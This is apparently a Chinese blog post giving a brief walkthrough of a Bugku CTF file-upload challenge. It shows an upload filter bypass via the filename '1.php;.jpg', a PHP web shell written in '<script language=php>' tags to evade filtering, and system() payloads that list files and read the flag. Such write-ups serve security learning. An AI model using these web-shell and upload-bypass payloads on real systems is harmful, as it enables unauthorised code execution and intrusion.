bugku ctf之文件上传2

打开题目链接http://47.93.190.246:49166/

看到file还有题目名就想包含一下,当然是尝试的flag.php,结果什么都没有,用php://filter试试发现作者已经过滤了

右键源码看到upload.php

上传文件名为1.php;.jpg,绕过检测,包含一下发现一句话的<?php?>这些字符被过滤,从其他文章处看到构造了<script language=php>@eval($_POST['cmd']);</script>菜刀连接被禁止了,又构造命令执行<acript language=php>system("ls")</script>,文件上传可以看到flag文件名,再构造<script language=php>system("cat flag..........txt")</script>上传得到flag

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • (源自摘抄整理)https://www.91ri.org/11494.html Webshell实现与隐藏探究 一...
    JackyTsuuuy阅读 20,982评论 2 13
  • 一套实用的渗透测试岗位面试题,你会吗? 1.拿到一个待检测的站,你觉得应该先做什么? 收集信息 whois、网站源...
    g0阅读 4,930评论 0 9
  • Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 135,080评论 19 139
  • 因为孩子的原因我辞职了,空闲的时间我就在家看看书,心血来潮也会码码字。我会把写的不错的文章发到朋友圈,偶尔也会发到...
    坚持日更的Olivia阅读 1,370评论 1 3
  • 今天周三,早晨又对孩子发火了,原因是由于前两天时间紧张的原因帮她一起穿衣服了,今早晨把衣服放在眼前又在那坐着...
    赵迅妈妈阅读 146评论 0 0